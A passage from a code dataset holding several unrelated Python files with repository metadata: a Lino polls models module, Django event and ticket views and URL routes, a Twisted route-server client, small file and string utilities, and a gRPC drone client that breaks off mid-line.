ChoicesBySet(Choices):\n master_key = 'choiceset'\n required_roles = dd.required()\n\n\n@dd.python_2_unicode_compatible\nclass Poll(UserAuthored, mixins.CreatedModified, Referrable):\n \"\"\"A series of questions.\"\"\"\n class Meta(object):\n app_label = 'polls'\n abstract = dd.is_abstract_model(__name__, 'Poll')\n verbose_name = _(\"Poll\")\n verbose_name_plural = _(\"Polls\")\n ordering = ['ref']\n\n title = models.CharField(_(\"Heading\"), max_length=200)\n\n details = models.TextField(_(\"Details\"), blank=True)\n\n default_choiceset = models.ForeignKey(\n 'polls.ChoiceSet',\n null=True, blank=True,\n related_name='polls',\n verbose_name=_(\"Default Choiceset\"))\n\n default_multiple_choices = models.BooleanField(\n _(\"Allow multiple choices\"), default=False)\n\n questions_to_add = models.TextField(\n _(\"Questions to add\"),\n help_text=_(\"Paste text for questions to add. 
\"\n \"Every non-empty line will create one question.\"),\n blank=True)\n\n state = PollStates.field(default=PollStates.draft.as_callable)\n\n workflow_state_field = 'state'\n\n def __str__(self):\n return self.ref or self.title\n\n def after_ui_save(self, ar, cw):\n if self.questions_to_add:\n # print \"20150203 self.questions_to_add\", self,\n # self.questions_to_add\n q = None\n qkw = dict()\n number = 1\n for ln in self.questions_to_add.splitlines():\n ln = ln.strip()\n if ln:\n if ln.startswith('#'):\n q.details = ln[1:]\n q.save()\n continue\n elif ln.startswith('='):\n q = Question(poll=self, title=ln[1:],\n is_heading=True, **qkw)\n number = 1\n else:\n q = Question(poll=self, title=ln,\n number=str(number), **qkw)\n number += 1\n q.full_clean()\n q.save()\n qkw.update(seqno=q.seqno + 1)\n self.questions_to_add = ''\n self.save() # save again because we modified afterwards\n\n super(Poll, self).after_ui_save(ar, cw)\n\n @dd.virtualfield(dd.HtmlBox(_(\"Result\")))\n def result(self, ar):\n return E.div(*tuple(get_poll_result(self)))\n\n\ndef get_poll_result(self):\n #~ yield E.h1(self.title)\n for cs in ChoiceSet.objects.all():\n questions = self.questions.filter(choiceset=cs)\n if questions.count() > 0:\n yield E.h2(str(cs))\n for question in questions:\n yield E.p(question.text)\n\n\nclass PollDetail(dd.DetailLayout):\n main = \"general results\"\n\n general = dd.Panel(\"\"\"\n ref title workflow_buttons\n details\n default_choiceset default_multiple_choices\n polls.QuestionsByPoll\n \"\"\", label=_(\"General\"))\n\n results = dd.Panel(\"\"\"\n id user created modified state\n polls.ResponsesByPoll\n # result\n PollResult\n \"\"\", label=_(\"Results\"))\n\n\nclass Polls(dd.Table):\n required_roles = dd.required(PollsUser)\n model = 'polls.Poll'\n column_names = 'ref title user state *'\n detail_layout = PollDetail()\n insert_layout = dd.InsertLayout(\"\"\"\n ref title\n default_choiceset default_multiple_choices\n questions_to_add\n \"\"\", window_size=(60, 15))\n\n\nclass AllPolls(Polls):\n required_roles = dd.required(PollsStaff)\n column_names = 'id ref title user state *'\n\n\nclass MyPolls(ByUser, Polls):\n column_names = 'ref title state *'\n\n\n@dd.python_2_unicode_compatible\nclass Question(mixins.Sequenced):\n \"\"\"A question of a poll.\n\n .. 
attribute:: number\n\n \"\"\"\n class Meta(object):\n app_label = 'polls'\n verbose_name = _(\"Question\")\n verbose_name_plural = _(\"Questions\")\n ordering = ['seqno']\n\n allow_cascaded_delete = ['poll']\n\n poll = models.ForeignKey('polls.Poll', related_name='questions')\n number = models.CharField(_(\"No.\"), max_length=20, blank=True)\n title = models.CharField(pgettext(\"polls\", \"Title\"), max_length=200)\n details = models.TextField(_(\"Details\"), blank=True)\n\n choiceset = models.ForeignKey('polls.ChoiceSet', blank=True, null=True)\n multiple_choices = models.BooleanField(\n _(\"Allow multiple choices\"), blank=True, default=False)\n is_heading = models.BooleanField(_(\"Heading\"), default=False)\n\n NUMBERED_TITLE_FORMAT = \"%s) %s\"\n\n def __str__(self):\n #~ return self.text[:40].strip() + ' ...'\n if self.number:\n return self.NUMBERED_TITLE_FORMAT % (self.number, self.title)\n return self.title\n\n def get_siblings(self):\n #~ return self.choiceset.choices.order_by('seqno')\n return self.poll.questions.order_by('seqno')\n\n def get_choiceset(self):\n if self.is_heading:\n return None\n if self.choiceset is None:\n return self.poll.default_choiceset\n return self.choiceset\n\n def full_clean(self, *args, **kw):\n if self.multiple_choices is None:\n self.multiple_choices = self.poll.default_multiple_choices\n #~ if self.choiceset_id is None:\n #~ self.choiceset = self.poll.default_choiceset\n super(Question, self).full_clean()\n\nQuestion.set_widget_options('number', width=5)\n\n\nclass Questions(dd.Table):\n required_roles = dd.required(PollsStaff)\n model = 'polls.Question'\n column_names = \"seqno poll number title choiceset is_heading *\"\n detail_layout = \"\"\"\n poll number is_heading choiceset multiple_choices\n title\n details\n AnswersByQuestion\n \"\"\"\n order_by = ['poll', 'seqno']\n\n\nclass QuestionsByPoll(Questions):\n required_roles = dd.required(PollsUser)\n master_key = 'poll'\n column_names = 'seqno number title:50 is_heading *'\n auto_fit_column_widths = True\n stay_in_grid = True\n\n\nclass ToggleChoice(dd.Action):\n \"\"\"Toggle the given choice for the given question in this response.\n \"\"\"\n readonly = False\n show_in_bbar = False\n parameters = dict(\n question=dd.ForeignKey(\"polls.Question\"),\n choice=dd.ForeignKey(\"polls.Choice\"),\n )\n no_params_window = True\n\n def run_from_ui(self, ar, **kw):\n response = ar.selected_rows[0]\n if response is None:\n return\n pv = ar.action_param_values\n qs = AnswerChoice.objects.filter(response=response, **pv)\n if qs.count() == 1:\n qs[0].delete()\n elif qs.count() == 0:\n if not pv.question.multiple_choices:\n # delete any other choice which might exist\n qs = AnswerChoice.objects.filter(\n response=response, question=pv.question)\n qs.delete()\n obj = AnswerChoice(response=response, **pv)\n obj.full_clean()\n obj.save()\n else:\n raise Exception(\n \"Oops, %s returned %d rows.\" % (qs.query, qs.count()))\n ar.success(refresh=True)\n # dd.logger.info(\"20140930 %s\", obj)\n\n\n@dd.python_2_unicode_compatible\nclass Response(UserAuthored, mixins.Registrable):\n\n class Meta(object):\n app_label = 'polls'\n verbose_name = _(\"Response\")\n verbose_name_plural = _(\"Responses\")\n ordering = ['date']\n\n poll = dd.ForeignKey('polls.Poll', related_name='responses')\n date = models.DateField(_(\"Date\"), default=dd.today)\n state = ResponseStates.field(default=ResponseStates.draft.as_callable)\n remark = models.TextField(verbose_name=_(\"My general remark\"), blank=True)\n partner = 
dd.ForeignKey('contacts.Partner', blank=True, null=True)\n\n toggle_choice = ToggleChoice()\n\n @dd.chooser()\n def poll_choices(cls):\n return Poll.objects.filter(state=PollStates.published)\n\n def __str__(self):\n if self.partner is None:\n return _(\"%(user)s's response to %(poll)s\") % dict(\n user=self.user, poll=self.poll)\n return _(\"{poll} {partner} {date}\").format(\n user=self.user.initials,\n date=dd.fds(self.date),\n partner=self.partner.get_full_name(salutation=False),\n poll=self.poll)\n\n @classmethod\n def get_registrable_fields(model, site):\n for f in super(Response, model).get_registrable_fields(site):\n yield f\n yield 'user'\n yield 'poll'\n yield 'date'\n yield 'partner'\n\n\nclass ResponseDetail(dd.DetailLayout):\n main = \"answers more\"\n answers = dd.Panel(\"\"\"\n poll partner date workflow_buttons\n polls.AnswersByResponse\n \"\"\", label=_(\"General\"))\n more = dd.Panel(\"\"\"\n user state\n remark\n \"\"\", label=_(\"More\"))\n\n\nclass Responses(dd.Table):\n required_roles = dd.required(PollsUser)\n model = 'polls.Response'\n detail_layout = ResponseDetail()\n insert_layout = \"\"\"\n user date\n poll\n \"\"\"\n\n\nclass AllResponses(Responses):\n required_roles = dd.required(PollsStaff)\n\n\nclass MyResponses(ByUser, Responses):\n column_names = 'date poll state remark *'\n\n\nclass ResponsesByPoll(Responses):\n master_key = 'poll'\n column_names = 'date user state partner remark *'\n\n\nclass ResponsesByPartner(Responses):\n \"\"\"Show all responses for a given partner. Default view is\n :meth:`get_slave_summary`.\n\n \"\"\"\n master_key = 'partner'\n column_names = 'date user state remark *'\n slave_grid_format = 'summary'\n\n @classmethod\n def get_slave_summary(self, obj, ar):\n \"\"\"Displays a summary of all responses for a given partner using a\n bullet list grouped by poll.\n\n \"\"\"\n if obj is None:\n return\n\n visible_polls = Poll.objects.filter(state__in=(\n PollStates.published, PollStates.closed)).order_by('ref')\n\n qs = Response.objects.filter(partner=obj).order_by('date')\n polls_responses = {}\n for resp in qs:\n polls_responses.setdefault(resp.poll.pk, []).append(resp)\n\n items = []\n for poll in visible_polls:\n iar = self.insert_action.request_from(\n ar, obj, known_values=dict(poll=poll))\n elems = [str(poll), ' : ']\n responses = polls_responses.get(poll.pk, [])\n elems += join_elems(\n [ar.obj2html(r, dd.fds(r.date))\n for r in responses], sep=', ')\n if poll.state == PollStates.published:\n elems += [' ', iar.ar2button()]\n #elems += [' ', iar.insert_button()]\n items.append(E.li(*elems))\n return E.div(E.ul(*items))\n\n\nclass AnswerChoice(dd.Model):\n\n class Meta(object):\n app_label = 'polls'\n verbose_name = _(\"Answer Choice\")\n verbose_name_plural = _(\"Answer Choices\")\n ordering = ['question__seqno']\n\n response = models.ForeignKey('polls.Response')\n question = models.ForeignKey('polls.Question')\n choice = models.ForeignKey(\n 'polls.Choice',\n related_name='answers', verbose_name=_(\"My answer\"),\n blank=True, null=True)\n\n @dd.chooser()\n def choice_choices(cls, question):\n return question.get_choiceset().choices.all()\n\n\nclass AnswerChoices(dd.Table):\n required_roles = dd.required(PollsStaff)\n model = 'polls.AnswerChoice'\n\n\n@dd.python_2_unicode_compatible\nclass AnswerRemark(dd.Model):\n\n class Meta(object):\n app_label = 'polls'\n verbose_name = _(\"Answer Remark\")\n verbose_name_plural = _(\"Answer Remarks\")\n ordering = ['question__seqno']\n\n response = models.ForeignKey('polls.Response')\n 
question = models.ForeignKey('polls.Question')\n remark = models.TextField(_(\"My remark\"), blank=True)\n\n def __str__(self):\n # return _(\"Remark for {0}\").format(self.question)\n return str(self.question)\n\n\nclass AnswerRemarks(dd.Table):\n required_roles = dd.required(PollsUser)\n model = 'polls.AnswerRemark'\n detail_layout = dd.DetailLayout(\"\"\"\n remark\n response question\n \"\"\", window_size=(60, 10))\n hidden_elements = dd.fields_list(AnswerRemark, 'response question')\n stay_in_grid = True\n\n\nclass AnswerRemarksByAnswer(AnswerRemarks):\n use_as_default_table = False\n hide_top_toolbar = True\n\n\nclass AllAnswerRemarks(AnswerRemarks):\n required_roles = dd.required(PollsStaff)\n\n\n@dd.python_2_unicode_compatible\nclass AnswersByResponseRow(object):\n \"\"\"Volatile object to represent the one and only answer to a given\n question in a given response.\n\n Used by :class:`AnswersByResponse` whose rows are instances of\n this.\n\n \"\"\"\n FORWARD_TO_QUESTION = tuple(\n \"full_clean after_ui_save disable_delete\".split())\n\n def __init__(self, response, question):\n self.response = response\n self.question = question\n # Needed by AnswersByResponse.get_row_by_pk\n self.pk = self.id = question.pk\n try:\n self.remark = AnswerRemark.objects.get(\n question=question, response=response)\n except AnswerRemark.DoesNotExist:\n self.remark = AnswerRemark(\n question=question, response=response)\n\n self.choices = AnswerChoice.objects.filter(\n question=question, response=response)\n for k in self.FORWARD_TO_QUESTION:\n setattr(self, k, getattr(question, k))\n\n def __str__(self):\n if self.choices.count() == 0:\n return str(_(\"N/A\"))\n return ', '.join([str(ac.choice) for ac in self.choices])\n\n\nclass AnswerRemarkField(dd.VirtualField):\n \"\"\"\n An editable virtual field.\n \"\"\"\n editable = True\n\n def __init__(self):\n t = models.TextField(_(\"My remark\"), blank=True)\n dd.VirtualField.__init__(self, t, None)\n\n def set_value_in_object(self, ar, obj, value):\n #~ e = self.get_entry_from_answer(obj)\n obj.remark.remark = value\n obj.remark.save()\n\n def value_from_object(self, obj, ar):\n #~ logger.info(\"20120118 value_from_object() %s\",dd.obj2str(obj))\n #~ e = self.get_entry_from_answer(obj)\n return obj.remark.remark\n\n\nclass AnswersByResponse(dd.VirtualTable):\n \"\"\"The table used for answering to a poll. The rows of this table are\n volatile :class:`AnswersByResponseRow` instances.\n\n .. attribute:: answer_buttons\n\n A virtual field that displays the currently selected answer(s) for\n this question, eventually (if editing is permitted) together with\n buttons to modify the selection.\n\n \"\"\"\n label = _(\"Answers\")\n editable = True\n master = 'polls.Response'\n column_names = 'question:40 answer_buttons:30 remark:20 *'\n variable_row_height = True\n auto_fit_column_widths = True\n slave_grid_format = 'summary'\n # workflow_state_field = 'state'\n\n remark = AnswerRemarkField()\n\n @classmethod\n def get_data_rows(self, ar):\n response = ar.master_instance\n if response is None:\n return\n for q in rt.modules.polls.Question.objects.filter(poll=response.poll):\n yield AnswersByResponseRow(response, q)\n\n @classmethod\n def get_slave_summary(self, response, ar):\n \"\"\"Presents this response as a table with one row per question and one\n column for each response of the same poll. 
The answers for\n this response are editable if this response is not registered.\n The answers of other responses are never editable.\n\n \"\"\"\n if response is None:\n return\n if response.poll_id is None:\n return\n AnswerRemarks = rt.modules.polls.AnswerRemarksByAnswer\n all_responses = rt.modules.polls.Response.objects.filter(\n poll=response.poll).order_by('date')\n if response.partner:\n all_responses = all_responses.filter(partner=response.partner)\n ht = xghtml.Table()\n ht.attrib.update(cellspacing=\"5px\", bgcolor=\"#ffffff\", width=\"100%\")\n cellattrs = dict(align=\"left\", valign=\"top\", bgcolor=\"#eeeeee\")\n headers = [_(\"Question\")]\n for r in all_responses:\n if r == response:\n headers.append(dd.fds(r.date))\n else:\n headers.append(ar.obj2html(r, dd.fds(r.date)))\n ht.add_header_row(*headers, **cellattrs)\n ar.master_instance = response # must set it because\n # get_data_rows() needs it.\n # 20151211\n # editable = Responses.update_action.request_from(ar).get_permission(\n # response)\n sar = Responses.update_action.request_from(ar)\n sar.selected_rows = [response]\n editable = sar.get_permission()\n\n kv = dict(response=response)\n insert = AnswerRemarks.insert_action.request_from(\n ar, known_values=kv)\n detail = AnswerRemarks.detail_action.request_from(ar)\n # editable = insert.get_permission(response)\n for answer in self.get_data_rows(ar):\n cells = [self.question.value_from_object(answer, ar)]\n for r in all_responses:\n if editable and r == response:\n insert.known_values.update(question=answer.question)\n detail.known_values.update(question=answer.question)\n items = [\n self.answer_buttons.value_from_object(answer, ar)]\n if answer.remark.remark:\n items += [E.br(), answer.remark.remark]\n if answer.remark.pk:\n items += [\n ' ',\n detail.ar2button(\n answer.remark, _(\"Remark\"),\n icon_name=None)]\n # ar.obj2html(answer.remark, _(\"Remark\"))]\n else:\n btn = insert.ar2button(\n answer.remark, _(\"Remark\"), icon_name=None)\n # sar = RemarksByAnswer.request_from(ar, answer)\n # btn = sar.insert_button(_(\"Remark\"), icon_name=None)\n items += [\" (\", btn, \")\"]\n\n else:\n other_answer = AnswersByResponseRow(r, answer.question)\n items = [str(other_answer)]\n if other_answer.remark.remark:\n items += [E.br(), answer.remark.remark]\n cells.append(E.p(*items))\n ht.add_body_row(*cells, **cellattrs)\n\n return E.div(ht.as_element(), class_=\"htmlText\")\n\n @dd.displayfield(_(\"My answer\"))\n def answer_buttons(self, obj, ar):\n # assert isinstance(obj, Answer)\n cs = obj.question.get_choiceset()\n if cs is None:\n return ''\n\n elems = []\n pv = dict(question=obj.question)\n\n ba = Responses.actions.toggle_choice\n if ba is None:\n raise Exception(\"No toggle_choice on {0}?\".format(ar.actor))\n sar = ba.request_from(ar)\n\n # print(\"20150203 answer_buttons({0})\".format(sar))\n\n # if the response is registered, just display the choice, no\n # toggle buttons since answer cannot be toggled:\n # 20151211\n sar.selected_rows = [obj.response]\n if not sar.get_permission():\n return str(obj)\n\n AnswerChoice = rt.modules.polls.AnswerChoice\n for c in cs.choices.all():\n pv.update(choice=c)\n text = str(c)\n qs = AnswerChoice.objects.filter(\n response=obj.response, **pv)\n if qs.count() == 1:\n text = [E.b('[', text, ']')]\n elif qs.count() == 0:\n pass\n else:\n raise Exception(\n \"Oops: %s returned %d rows.\" % (qs.query, qs.count()))\n sar.set_action_param_values(**pv)\n e = sar.ar2button(obj.response, text, style=\"text-decoration:none\")\n 
elems.append(e)\n return E.span(*join_elems(elems), class_=\"htmlText\")\n\n @classmethod\n def get_pk_field(self):\n return Question._meta.pk\n\n @classmethod\n def get_row_by_pk(self, ar, pk):\n response = ar.master_instance\n #~ if response is None: return\n q = rt.modules.polls.Question.objects.get(pk=pk)\n return AnswersByResponseRow(response, q)\n\n @classmethod\n def disable_delete(self, obj, ar):\n return \"Not deletable\"\n\n @dd.displayfield(_(\"Question\"))\n def question(self, obj, ar):\n if obj.question.number:\n txt = obj.question.NUMBERED_TITLE_FORMAT % (\n obj.question.number, obj.question.title)\n else:\n txt = obj.question.title\n\n attrs = dict(class_=\"htmlText\")\n if obj.question.details:\n attrs.update(title=obj.question.details)\n if obj.question.is_heading:\n txt = E.b(txt, **attrs)\n return E.span(txt, **attrs)\n\n\n@dd.python_2_unicode_compatible\nclass AnswersByQuestionRow(object):\n \"\"\"Volatile object to represent a row of :class:`AnswersByQuestion`.\n\n \"\"\"\n FORWARD_TO_RESPONSE = tuple(\n \"full_clean after_ui_save disable_delete\".split())\n\n def __init__(self, response, question):\n self.response = response\n self.question = question\n # Needed by AnswersByQuestion.get_row_by_pk\n self.pk = self.id = response.pk\n try:\n self.remark = AnswerRemark.objects.get(\n question=question, response=response).remark\n except AnswerRemark.DoesNotExist:\n self.remark = ''\n\n self.choices = AnswerChoice.objects.filter(\n question=question, response=response)\n for k in self.FORWARD_TO_RESPONSE:\n setattr(self, k, getattr(question, k))\n\n def __str__(self):\n if self.choices.count() == 0:\n return str(_(\"N/A\"))\n return ', '.join([str(ac.choice) for ac in self.choices])\n\n\nclass AnswersByQuestion(dd.VirtualTable):\n \"\"\"The rows of this table are volatile :class:`AnswersByQuestionRow`\ninstances.\n\n \"\"\"\n label = _(\"Answers\")\n master = 'polls.Question'\n column_names = 'response:40 answer:30 remark:20 *'\n variable_row_height = True\n auto_fit_column_widths = True\n\n @classmethod\n def get_data_rows(self, ar):\n question = ar.master_instance\n if question is None:\n return\n for r in rt.modules.polls.Response.objects.filter(poll=question.poll):\n yield AnswersByQuestionRow(r, question)\n\n @dd.displayfield(_(\"Response\"))\n def response(self, obj, ar):\n return ar.obj2html(obj.response)\n\n @dd.displayfield(_(\"Remark\"))\n def remark(self, obj, ar):\n return obj.remark\n\n @dd.displayfield(_(\"Answer\"))\n def answer(self, obj, ar):\n return str(obj)\n\n\nclass PollResult(Questions):\n \"Shows a summay of responses to this poll.\"\n master_key = 'poll'\n column_names = \"question choiceset answers a1\"\n\n # @classmethod\n # def get_data_rows(self, ar):\n # poll = ar.master_instance\n # if poll is None:\n # return\n # for obj in super(PollResult, self).get_request_queryset(ar):\n # yield obj\n\n @dd.virtualfield(dd.ForeignKey('polls.Question'))\n def question(self, obj, ar):\n return obj\n\n @dd.requestfield(_(\"#Answers\"))\n def answers(self, obj, ar):\n #~ return ar.spawn(Answer.objects.filter(question=obj))\n return AnswerChoices.request(known_values=dict(question=obj))\n\n @dd.requestfield(_(\"A1\"))\n def a1(self, obj, ar):\n cs = obj.get_choiceset()\n if cs is not None:\n c = next(iter(cs.choices.all()))\n #~ return Answer.objects.filter(question=obj,choice=c)\n return AnswerChoices.request(\n known_values=dict(question=obj, 
choice=c))\n\n\n","repo_name":"amir17688/google_data_p2","sub_path":"86937_models.py_C__Users_user_Desktop_data_2_data_google_data_lsaffre_lino_lino_modlib_polls.py","file_name":"86937_models.py_C__Users_user_Desktop_data_2_data_google_data_lsaffre_lino_lino_modlib_polls.py","file_ext":"py","file_size_in_byte":25617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29255575789","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render\n\nfrom TicketsReservation.views import view_event\nfrom forms import EventForm\nfrom forms import SectorForm\nfrom django.template import loader\nfrom django.http import HttpResponse\nfrom models import Event\nfrom TicketsReservation.models import Tickets\nfrom django.core.mail import EmailMessage\n\n\n@login_required\ndef add_event(request):\n if request.method == 'POST':\n form = EventForm(request.POST)\n if form.is_valid():\n event = form.save(commit=False)\n event.user = request.user\n event.save()\n\n return view_event(request, event.id)\n else:\n form = EventForm()\n return render(request, 'add_event.html', {'form': form})\n\n\n@login_required()\ndef add_sector(request, event_id):\n if request.method == 'POST':\n form = SectorForm(event_id, request.POST)\n if form.is_valid():\n sector = form.save(commit=False)\n sector.user = request.user\n sector.save()\n\n return view_event(request, event_id)\n else:\n form = SectorForm(event_id)\n return render(request, 'add_sector.html', {'form': form})\n\n\ndef confirm_cancel(request, event_id):\n template = loader.get_template('confirm_cancelation.html')\n context = {\n 'event': Event.objects.get(id=event_id)\n }\n return HttpResponse(template.render(context, request))\n\n\ndef cancel_event(request, event_id):\n event = Event.objects.get(id=event_id)\n tickets = Tickets.objects.filter(event_id = event_id)\n for ticket in tickets:\n content = 'We are sorry to inform that the event: ' + str(ticket.event.name) + ' was canceled.'\n mail = EmailMessage('Event canceled', content, 'janusze.pythona@gmail.com', [ticket.guest_email])\n mail.send()\n event.delete()\n return render(request, 'user_home.html')\n\n\ndef edit_event(request, event_id):\n event = Event.objects.get(id=event_id)\n form = EventForm(request.POST or None, instance=event)\n if form.is_valid():\n form.save()\n return view_event(request, event_id)\n return render(request, 'edit_event.html', {'form': form})\n\n","repo_name":"JanuszePythona/TicketsReservation","sub_path":"TicketsRes/EventCreator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8097098255","text":"\"\"\"This module is an interface to the Route Controller. 
It provides APIs to send\nnetwork events to the route controller and to receive control commands.\n\"\"\"\nimport eventlet\neventlet.monkey_patch()\n\nimport logging\nimport json\nimport time\nimport os\n\nfrom twisted.internet import reactor, protocol\nfrom twisted.internet.protocol import ReconnectingClientFactory\nfrom twisted.protocols.basic import LineReceiver\n\nlogger = logging.getLogger('fbgp.server_connect')\n\nclass RouteServerProtocol(LineReceiver):\n\n delimiter = b'\\n'\n\n def __init__(self, handler):\n self.handler = handler\n\n def connectionMade(self):\n self.handler({'msg_type': 'server_connected', 'msg': self.transport.getPeer()})\n\n def connectionLost(self, reason):\n self.handler({'msg_type': 'server_disconnected', 'msg': reason.getErrorMessage()})\n\n def lineReceived(self, raw):\n if type(raw) == bytes:\n raw = raw.decode('utf-8')\n self.handler({'msg_type': 'server_command', 'msg': raw})\n\n def send(self, msg):\n self.sendLine(msg)\n\n\nclass ServerConnect(ReconnectingClientFactory):\n\n def __init__(self, handler):\n self.proto = None\n self.running = False\n self.handler = handler\n self.server_addr = os.environ.get('FBGP_SERVER_ADDR') or 'localhost'\n self.server_port = int(os.environ.get('FBGP_SERVER_PORT') or 9999)\n self.send_q = eventlet.Queue(128)\n\n def send(self, data):\n \"\"\"Send data (string or dict) to the route server.\"\"\"\n if isinstance(data, dict):\n msg = json.dumps(data)\n else:\n msg = str(data)\n if not self.proto:\n self.send_q.put(msg)\n return False\n reactor.callFromThread(lambda: self.proto.send(msg.encode('utf-8'))) #pylint: disable=no-member\n return True\n\n def start(self):\n reactor.connectTCP(self.server_addr, self.server_port, self, timeout=10) #pylint: disable=no-member\n t = eventlet.spawn(reactor.run) #pylint: disable=no-member\n eventlet.sleep(0)\n return t\n\n def stop(self):\n reactor.stop() #pylint: disable=no-member\n\n def clientConntionFailed(self, connector, reason):\n logger.error('Failed to connect to gRCP server: %s' % reason)\n ReconnectingClientFactory.clientConnectionFailed(self, connector, reason)\n\n def clientConnectionLost(self, connector, reason):\n logger.error('Lost connection to gRCP server: %s' % reason)\n ReconnectingClientFactory.clientConnectionLost(self, connector, reason)\n\n\n def buildProtocol(self, addr):\n logger.info('Connected to gRCP server: %s' % addr)\n self.resetDelay()\n self.proto = RouteServerProtocol(self.handler)\n while not self.send_q.empty():\n try:\n msg = self.send_q.get(timeout=1)\n self.send(msg)\n except:\n break\n return self.proto\n","repo_name":"trungdtbk/fbgp2","sub_path":"fbgp/server_connect.py","file_name":"server_connect.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"6050807186","text":"import os\n\n_PROJECT_PATH = os.path.realpath(__file__)\nfor i in range(3):\n _PROJECT_PATH = os.path.dirname(_PROJECT_PATH)\n\n\ndef get_relative_path(rel_dir=None, file_name=None, make_dirs=True):\n if rel_dir is not None:\n result = os.path.join(_PROJECT_PATH, rel_dir)\n if make_dirs and not os.path.exists(result):\n os.mkdir(result)\n else:\n result = _PROJECT_PATH\n\n if file_name is not None:\n result = os.path.join(result, file_name)\n\n return result\n\n\ndef directory_traverse(relative_directory):\n file_list = []\n for dirpath, dirs, files in os.walk(relative_directory):\n file_list.extend([(dirpath, file) for file in files])\n return file_list\n\n\ndef 
import_module_from_file(base_path, module_path, module_name):\n # this won't work because import is called inside a function scope\n if module_name.endswith('.py') and not module_name.startswith('__'):\n import_path = module_path.replace(base_path, '').replace(os.path.sep, '.')\n\n exec(f'from {import_path}.{module_name.replace(\".py\", \"\")} import *')\n\n\nif __name__ == '__main__':\n base_path = get_relative_path('test_file_directory')\n files = directory_traverse(base_path)\n for m in files:\n import_module_from_file(base_path, *m) # this won't work because import is called inside a function scope\n print(files)\n\n","repo_name":"r-azh/TestProject","sub_path":"TestPython/test_file_directory/test_directory_traverse/directory_traverse_for_import.py","file_name":"directory_traverse_for_import.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32020196380","text":"#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n# Date : 2015-10-11\n# Author: Master Yumi\n# Email : yumi@meishixing.com\n\nimport hashlib\nfrom datetime import datetime\n\ndef md5(text):\n \"\"\"md5加密\"\"\"\n return hashlib.md5(text).hexdigest()\n\ndef to_utf8(text):\n \"\"\"将对象转化成str\"\"\"\n if isinstance(text, unicode):\n return text.encode(\"utf8\")\n if isinstance(text, datetime):\n return text.strftime(\"%Y-%m-%d %H:%M:%S\") \n return str(text)\n\ndef check_mobile(self):\n user_agent = self.request.headers.get(\"User-Agent\", \"\").lower()\n mobile_agent = ['iphone', 'android', 'phone', 'mobile', 'wap', 'netfront', 'java', 'opera mobi', 'opera mini',\n 'ucweb', 'windows ce', 'symbian', 'series', 'webos', 'sony', 'blackberry', 'dopod', 'nokia', 'samsung', \n 'palmsource', 'xda', 'pieplus', 'meizu', 'midp', 'cldc', 'motorola', 'foma', 'docomo', 'up.browser', \n 'up.link', 'blazer', 'helio', 'hosin', 'huawei', 'novarra', 'coolpad', 'webos', 'techfaith', 'palmsource', \n 'alcatel', 'amoi', 'ktouch', 'nexian', 'ericsson', 'philips', 'sagem', 'wellcom', 'bunjalloo', 'maui', 'smartphone', \n 'iemobile', 'spice', 'bird', 'zte-', 'longcos', 'pantech', 'gionee', 'portalmmm', 'jig browser', 'hiptop', \n 'benq', 'haier', '^lct', '320x320', '240x320', '176x220']\n for agent in mobile_agent:\n if user_agent.find(agent) > 0:\n return True\n return False\n\n","repo_name":"MrEleven/Unicorn","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27212039199","text":"from django.urls import path, re_path, include\nfrom rest_framework import routers\n\nfrom . import api\nfrom . 
import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'product', api.productViewSet)\nrouter.register(r'cart', api.cartViewSet)\nrouter.register(r'order', api.orderViewSet)\n\n\nurlpatterns = (\n # urls for Django Rest Framework API\n path('api/', include(router.urls)),\n)\n\nurlpatterns += (\n # urls for Django Rest Framework API\n re_path(r'^$', views.HomeView.as_view(), name='home'),\n)\n\nurlpatterns += (\n # urls for product\n path('product/', views.productListView.as_view(), name='app_product_list'),\n path('product/create/', views.productCreateView.as_view(),\n name='app_product_create'),\n path('product/detail//',\n views.productDetailView.as_view(), name='app_product_detail'),\n path('product/update//',\n views.productUpdateView.as_view(), name='app_product_update'),\n)\n\nurlpatterns += (\n # urls for cart\n path('cart/', views.cartListView.as_view(), name='app_cart_list'),\n path('cart/create/', views.cartCreateView.as_view(), name='app_cart_create'),\n path('cart/detail//',\n views.cartDetailView.as_view(), name='app_cart_detail'),\n path('cart/update//',\n views.cartUpdateView.as_view(), name='app_cart_update'),\n)\n\nurlpatterns += (\n # urls for order\n path('order/', views.orderListView.as_view(), name='app_order_list'),\n path('order/create/', views.orderCreateView.as_view(),\n name='app_order_create'),\n path('order/detail//',\n views.orderDetailView.as_view(), name='app_order_detail'),\n path('order/update//',\n views.orderUpdateView.as_view(), name='app_order_update'),\n)\n","repo_name":"rtgrrk/4tu","sub_path":"app/tu/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71439037047","text":"import sys\n\nimport grpc\n\nimport drone_pb2\nimport drone_pb2_grpc\n\ndef run():\n host = 'localhost:' + sys.argv[1]\n channel = grpc.insecure_channel(host)\n stub = drone_pb2_grpc.DirectionerStub(channel)\n resp = stub.Register(drone_pb2.IdReq())\n\n if resp.uid == -1:\n print('Already have 2 drones.')\n else:\n print('Client id [%d] connected to the server.' 
